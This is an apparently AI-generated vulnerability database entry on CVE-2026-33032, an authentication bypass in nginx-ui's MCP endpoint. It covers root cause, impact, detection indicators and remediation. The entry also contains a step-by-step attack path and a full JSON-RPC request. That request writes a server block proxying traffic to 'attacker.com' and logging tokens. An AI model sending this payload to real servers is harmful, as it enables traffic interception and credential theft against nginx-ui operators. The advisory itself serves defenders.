
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33032 is a critical authentication bypass vulnerability in nginx-ui's Model Context Protocol (MCP) integration, dubbed "MCPwn," that allows unauthenticated remote attackers to achieve complete nginx service takeover. The flaw affects nginx-ui versions up to and including 2.3.5 (also reported as ≤ 1.99 in the GitHub Advisory Database). It was published on March 28, 2026 by the project maintainer and added to the GitHub Advisory Database on March 30, 2026. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, Security Advisory).
The root cause is a missing authentication middleware on the /mcp_message HTTP endpoint (CWE-306: Missing Authentication for Critical Function). In mcp/router.go, the /mcp endpoint correctly applies both middleware.IPWhiteList() and middleware.AuthRequired(), but the /mcp_message endpoint only applies middleware.IPWhiteList() — omitting AuthRequired() entirely. Both endpoints route to the same mcp.ServeHTTP() handler, which dispatches all MCP tool invocations. Compounding the issue, the IP whitelist middleware in internal/middleware/ip_whitelist.go is fail-open: when IPWhiteList is empty (the default, as settings/auth.go initializes Auth{} with no whitelist), all requests are permitted through unconditionally. An attacker with network access to port 9000 (the default nginx-ui port) can send unauthenticated JSON-RPC requests to /mcp_message to invoke any MCP tool, including nginx_config_add, nginx_config_modify, restart_nginx, and reload_nginx (GitHub Advisory, Security Advisory).
Successful exploitation grants an unauthenticated attacker complete control over the nginx service. Attackers can create, modify, or delete any nginx configuration file and trigger immediate reloads or restarts, enabling traffic interception by rewriting server blocks to proxy all traffic through attacker-controlled endpoints — capturing credentials, session tokens, and sensitive data in transit. All existing nginx configurations are readable via nginx_config_get, exposing backend topology, upstream servers, TLS certificate paths, and authentication headers. Writing an invalid configuration and triggering a reload can take nginx offline, causing a denial of service for all proxied services. Credential harvesting via injected access_log directives can further enable escalation to the nginx-ui REST API (Security Advisory, GitHub Advisory).
This vulnerability is being actively exploited in the wild, with exploitation confirmed by multiple security vendors including eSentire and reported by BleepingComputer, SecurityWeek, and The Hacker News (BleepingComputer, SecurityWeek, eSentire). A concrete PoC exploit is publicly available in the official security advisory, consisting of a single HTTP POST request to /mcp_message with a JSON-RPC payload — no authentication header required. A Python-based vulnerability scanner (cve-2026-33032-scanner) has also been published on GitHub. The malware family AGINGFLY has been reported to have weaponized this vulnerability (Feedly). The EPSS score is approximately 13.74% (94th percentile) per the GitHub Advisory Database. Nuclei detection templates have been added to ProjectDiscovery's nuclei-templates repository. No CISA KEV catalog listing was confirmed in the available data.
Reconnaissance: Identify internet-facing nginx-ui instances using tools like Shodan or Censys, searching for the default nginx-ui port (9000) or known nginx-ui web interface fingerprints. Confirm the target is running a vulnerable version (≤ 2.3.5).
Verify unauthenticated access: Send a read-only MCP tool invocation (e.g., nginx_status or nginx_config_list) to POST /mcp_message without any Authorization header to confirm the endpoint is accessible and unauthenticated.
Enumerate nginx configuration: Invoke the nginx_config_list and nginx_config_get MCP tools to enumerate all existing nginx configuration files, revealing backend topology, upstream servers, TLS paths, and authentication headers.
Inject malicious configuration: Send a crafted JSON-RPC payload to POST /mcp_message invoking nginx_config_add or nginx_config_modify to write a malicious nginx server block — for example, a reverse proxy that logs Authorization headers to a file or forwards traffic to an attacker-controlled host:
POST /mcp_message HTTP/1.1
Content-Type: application/json
{"jsonrpc":"2.0","method":"tools/call","params":{"name":"nginx_config_add","arguments":{"name":"evil.conf","content":"server { listen 8443; location / { proxy_pass http://attacker.com; access_log /etc/nginx/conf.d/tokens.log; } }","base_dir":"conf.d","overwrite":true,"sync_node_ids":[]}},"id":1}Trigger nginx reload: The nginx_config_add tool auto-reloads nginx upon writing (via nginx.Control(nginx.Reload)). Alternatively, explicitly invoke reload_nginx or restart_nginx via the same unauthenticated endpoint to apply the malicious configuration immediately.
Achieve objectives: With nginx now serving the attacker's configuration, intercept proxied traffic, harvest credentials, exfiltrate data, or cause a denial of service by writing an invalid configuration and reloading (Security Advisory, GitHub Advisory).
/mcp_message on port 9000 (or the configured nginx-ui port) from external or untrusted IP addresses; outbound connections from the nginx-ui server to unknown external hosts following configuration changes; unusual traffic patterns on port 8443 or other newly opened ports./mcp_message without an Authorization header; JSON-RPC method calls such as tools/call with tool names nginx_config_add, nginx_config_modify, restart_nginx, or reload_nginx from unexpected sources; nginx access logs showing new access_log entries in unexpected paths (e.g., /etc/nginx/conf.d/tokens.log)./etc/nginx/conf.d/) with unexpected names (e.g., evil.conf); unexpected changes to nginx.conf or site configuration files; new log files in the nginx config directory capturing request headers.The official remediation is to add middleware.AuthRequired() to the /mcp_message route in mcp/router.go, matching the protection already applied to the /mcp endpoint. The patched code (visible in the current repository at commit f89f8ff) shows both routes now include middleware.AuthRequired(). As an immediate workaround, configure a non-empty IP whitelist in nginx-ui's auth settings to restrict access to the MCP endpoints by IP address, which will cause the middleware to enforce IP-based access control rather than allowing all traffic. Additionally, implement network-level controls (firewall rules, VPN, or network segmentation) to restrict access to the nginx-ui port (default: 9000) to trusted hosts only. Monitor for unauthorized access to MCP endpoints and any unexpected nginx configuration changes (Security Advisory, Rapid7 ETR).
The vulnerability received widespread coverage across the security community under the nickname "MCPwn," with major outlets including BleepingComputer, The Hacker News, SecurityWeek, Dark Reading, and Infosecurity Magazine all reporting on active exploitation (BleepingComputer, The Hacker News, Dark Reading). National CERTs including Canada's CCCS (AV26-360), Singapore's CSA (AL-2026-039), Austria's CERT.at, and Thailand's ThaiCERT issued advisories urging immediate action (CCCS Advisory, CSA Advisory). Security researchers highlighted the vulnerability as a cautionary example of MCP integration security risks, with Picus Security publishing a detailed technical breakdown and Rapid7 issuing an Emerging Threat Response (Rapid7 ETR). Community discussion on Reddit and social media was active, with homelab users and security professionals flagging the risk to self-hosted nginx-ui deployments. SentinelOne included it in their Week 16 threat roundup, and Recorded Future highlighted it in their April 2026 CVE landscape report (Recorded Future).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."